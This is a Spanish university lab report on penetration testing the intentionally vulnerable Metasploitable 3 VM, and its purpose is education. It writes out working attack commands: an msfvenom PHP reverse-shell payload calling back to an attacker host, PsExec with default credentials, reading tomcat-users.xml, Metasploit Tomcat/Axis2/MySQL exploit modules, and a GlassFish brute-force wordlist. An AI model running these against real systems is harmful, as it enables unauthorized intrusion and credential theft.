Está en la página 1de 20

Participante:

JOHN ALEJANDRO ACOSTA CHACON

UNIVERSIDAD NACIONAL ABIERTA Y A DISTANCIA – UNAD


ESCUELA DE CIENCIAS BASICAS, TECNOLOGIA E INGENIERIA - ECBTI
ESPECIALIZACIÓN EN SEGURIDAD INFORMÁTICA
2022

1
Participante:
JOHN ALEJANDRO ACOSTA CHACON

DANNY FERNANDO LEON


Tutor:

UNIVERSIDAD NACIONAL ABIERTA Y A DISTANCIA – UNAD


ESCUELA DE CIENCIAS BASICAS, TECNOLOGIA E INGENIERIA - ECBTI
ESPECIALIZACIÓN EN SEGURIDAD INFORMÁTICA
2022

2
CONTENIDO

Tabla de contenido

Introducción .................................................................................................................. 4
Objetivos ....................................................................................................................... 4
Desarrollo Del Trabajo ................................................................................................... 5
Bibliografía.................................................................................................................. 20

3
Introducción

En esta oportunidad procederemos a la explotación de las vulnerabilidades expuestas en


la máquina virtual metasploitable 3, se utilizarán herramientas de alto nivelo alto impacto,
el cual permitirán aprovechar cualquier hueco de seguridad o vulnerabilidad

Este componente practico tiene la finalidad de poder validar todas las capacidades de los
ingenieros encargados en el proyecto para que se evidencie los estándares de calidad y
seguridad bajo la respectiva normatividad vigente.

Objetivos

• Mostrar metodologías de ataque en entorno practico, y demostrar la configuración


eficiente de servicios vitales para cualquier infraestructura

• Configurar servicios bajo las mejores prácticas y metodologías existentes

• Proponer esquemas de detección, gestión e identificación de ataques a partir de


metodologías y técnicas de intrusión, Testing e ingeniería social.

4
Desarrollo Del Trabajo

Instalación Metasploitable 3 Windows

Se procede a la instalación que se está solicitando la cual es metasploitable 3 para versión


Windows, en primera instancia se instala el Hypervisor el cual es VirtualBox y se instalan
los complementos como Vagrant

Fg:1 Hypervisor Instalado VirtualBox

Para la instalación y despliegue de la maquina solicitada se requiere instalar el Software


Vagrant, el cual se procede a su respectiva instalación.

5
Fg:2 Instalación Vagrant

Fg:3 Instalación Vagrant

Procedemos a la instalación y ejecución de comandos para la instalación de la maquina


virtual denominada metasploitable 3, ejecutamos el comando de creación de carpeta y
espacio de trabajo, esto se realiza en una interfaz de power Shell.

Fg:4 Instalación VM Metasploitable 3

6
Se realiza el levantamiento o ejecución de lo que se configuro junto con la maquina
necesaria, en esta instancia inicia a instalar la máquina virtual con el sistema operativo
Windows server 2008, esperamos que termine la instalación y despliegue.

Fg:5 Instalación VM Metasploitable 3

Luego de la instalación y parametrización, se procede a ejecutar la maquina en nuestro


hipervisor y como se puede evidenciar ya se logró instalar nuestra maquina requerida para
el proceso de reconocimiento y explotación que se solicita.

Fg:6 Instalación VM Metasploitable 3

7
Explotación Vulnerabilidades Metasploitable 3

Luego de instalar nuestra máquina virtual vulnerable como lo es metasploitable 3,


procedemos a realizar el proceso de reconocimiento activo donde vamos a encontrar
múltiples vulnerabilidades y luego se procede a explotar e indicar el proceso para su
respectiva remediación.

▪ Explotación Server WEB Apache


Se procede a ejecutar el reconocimiento del objetivo el cual tiene la IP 172.16.3.122, para
esto empleamos nuestra máquina de Kali Linux 2022 y lo hacemos de esta manera.
Realizamos la búsqueda por el puerto especifico, ya que por ese puerto se emplea este
servicio de apache.
nmap -p8585 172.16.3.122

Fg:7 Reconocimiento NMAP

Verificamos el puerto por interfaz y nos podemos dar cuenta que pertenece a un
servicio WAMP

Fg:8 Reconocimiento Metasploitable 3

8
Procedemos a correr otra herramienta llamada Nikto donde nos va aparecer muchas más
información sobre puertos y demás y temas más a fondo de dicha vulnerabilidad, ya que al
investigar la página nos damos cuenta que hay una carpeta Uploads vulnerable e
interesante

Ejecutamos - Nikto -h http://172.16.3.122:8585/uploads/

Fg:9 Reconocimiento Metasploitable 3

Aquí podemos ver que el directorio Upload con el método HTTP UP nos permite cargar
archivos, aquí podemos montar un archivo malicioso y esto puede ser parte de nuestro
ataque.
Ahora con msfvenon procedemos a preparar el archivo que vamos a cargar y poder explotar
dicha vulnerabilidad

Ejecutamos msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.3.114 lport=4444 -f


raw

Fg:10 Explotacion Metasploitable 3

9
Se genera la conexión reversa bajo el archivo implementado

Fg:11 Explotación Metasploitable 3

Finalmente se logró atacar el servidor cargando un archivo malicioso bajo las herramientas
ya mencionadas y logramos obtener acceso a los archivos y parámetros del servidor WEB.

▪ Vulnerabilidad TOMCAT por SMB


Procedemos al scan del objetivo de esta manera
Ejecutamos: nmap -sV -p8282 172.16.3.122

Fg:12 Scan Metasploitable 3

Cuando abrimos el puerto bajo interfaz nos podemos dar cuenta que lleva un servicio
bajo TOMCAT

10
Fg:13 Servicio Metasploitable 3

Vamos a utilizar un programa llamado psexec donde nos va permitir ingresar bajo el
puerto 445

Ejecutamos: PsExec.exe \\172.16.3.122 -u vagrant -p vagrant cmd


Cuando ejecutamos podemos evidenciar de una manera clara que logramos tener
acceso al sistema o ficheros de archivos del server.

Fg:14 Servicio Metasploitable 3

En el momento que sabemos que existe alguna instancia de TOMCAT se puede


recuperar las credenciales del archivo tomcat-users.xml, Situado en: cd c:\program
files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf type tomcat-
users.xml

11
Para obtener la credencial debemos usar esta clave con Metasploit.

Fg:15 Servicio Metasploitable 3

Luego procedemos a ejecutar Metasploit y cargamos el modulo necesario


“tomat_mgr_upload esto es para el ataque bajo TOMCAT.
El módulo lo usaremos para ejecutar algún Payload en el servidor web el cual es el que
tiene la aplicación expuesta esto lo cargamos como archivo WAR

Ejecutamos:
▪ use exploit/multi/http/tomcat_mgr_upload
▪ set rhost 172.16.3.122
▪ set rport 8282
▪ set HttpUsername sploit
▪ set HttpPassword sploit
▪ exploit

12
Fg:16 Servicio Metasploitable 3

Ahora iniciamos sesión bajo el módulo de sesión con instancia de administración web
usando clave y usuario especifico

Ejecutamos:
▪ use exploit/multi/http/axis2_deployer
▪ set rhost 172.16.3.122
▪ set rport 8282
▪ exploit

Fg:17 Servicio Metasploitable 3

De esta forma nos damos cuenta de que logramos vulnerar nuestro servidor web bajo
TOMCAT y las herramientas usadas en este pentest practico.

13
▪ Vulnerabilidad contra servicio GLASSFISH

Procedemos a ejecutar scan del objetivo el cual es el mismo que estamos trabajando
Ejecutamos: nmap -p 4848 -sV 172.16.3.122

Fg:18 Reconocimiento Metasploitable 3

Procedemos a la verificación del servicio bajo interfaz y nos damos cuenta que pertenece
a un servicio Oracle llamao GLASSFISH

Fg:19 Servicio Metasploitable 3

14
Iniciamos metasplotable y cargamos el módulo el cual hace varios intentos de sesión
del panel de administración o manager realizando fuerza bruta ascendente al objetivo y
servicio.

Creamos el respectivo DIR de user


▪ vim /root/user.txt
▪ admin

Contraseñas

vim /root/pass.txt
metasploitable
vulnerabilities
Autounattend
Contributing
security
exploits
versions
approach
building
multiple
virtualization
vagrant
sploit

Iniciamos metasplotable y ejecutamos el respectivo ataque que se esta preparando

Ejecutamos:

Msfconsole
use auxiliary/scanner/http/glassfish_login
set rhosts 172.16.3.122
set rport 4848
set STOP_ON_SUCCESS true
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

15
Podemos verificar y vemos que encontramos las credenciales y usuario del servicio

Fg:20 Servicio Metasploitable 3

Validamos el acceso al servicio

Fg:21 Servicio Metasploitable 3

16
Podemos evidenciar que logramos ingresar al servicio aprovechando la vulnerabilidad.

• Vulnerabilidad MYSQL

Procedemos a ejecutar scan del activo

Ejecutamos: nmap -p 3306 -sV 172.16.3.122

Fg:22 Reconocimiento Metasploitable 3

Al realizar análisis nos damos cuenta de que hay un servicio MYSQL, podemos
evidenciar que un usuario no esta protegido bajo contraseñas seguras, se procede a
realizar ataque con metasploit

Ejecutamos:

▪ msfconsole use exploit/windows/mysql/mysql_payload


▪ set rhost 172.16.3.122
▪ set rport 3306
▪ exploit

Fg:23 Servicio Metasploitable 3

17
Fg:24 Servicio Metasploitable 3

Podemos evidenciar que logramos terminar y aprovechamos la vulnerabilidad con fuerza


bruta del servicio MYSQL.

Topología Laboratorio

Fg:25 Topología

18
Recomendaciones y remediación

Luego de evidenciar las múltiples vulnerabilidades que encontramos en el servidor


implementado el cual fue bajo Metasploitable 3, podemos definir lo siguiente:

• Para todos los servicios que se tienen se debe emplear las buenas
prácticas de seguridad y contraseñas, para todo activo y servicio interno
o externo

• Cuando se tienen servicios de bases de datos debemos encriptar las keys


de la base de datos con el fin que no se tenga información expuesta

• En las herramientas perimetrales se debe perfilar bajo políticas el acceso


a los servicios y el respectivo tráfico de la red LAN.

• Aplicar prácticas de seguridad en la información para todos los activos


críticos de la organización o para la infraestructura critica

19
Bibliografía

Hacking. Junio 2022. Disponible en: https://www.hackingarticles.in/ftp-service-


exploitation-metasploitable-3/

Hacking. Junio 2022. Disponible en: https://www.hackingarticles.in/penetration-


testing-metasploitable-3-smb-tomcat/

Kali Linux Junio 2022 Disponible: https://www.kali.org/

Ciberseguridad Junio 2022 Disponible en:


https://www.campusciberseguridad.com/blog/item/118-tipos-de-vulnerabilidades-
en-ciberseguridad

Ciberseguridad Junio 2022 Disponible en:


https://www.google.com/search?q=ataques+ciberneticos&oq=ataques+&aqs=chro
me.1.69i57j0i512l5j0i433i512j69i61.2296j0j4&sourceid=chrome&ie=UTF-8

20

También podría gustarte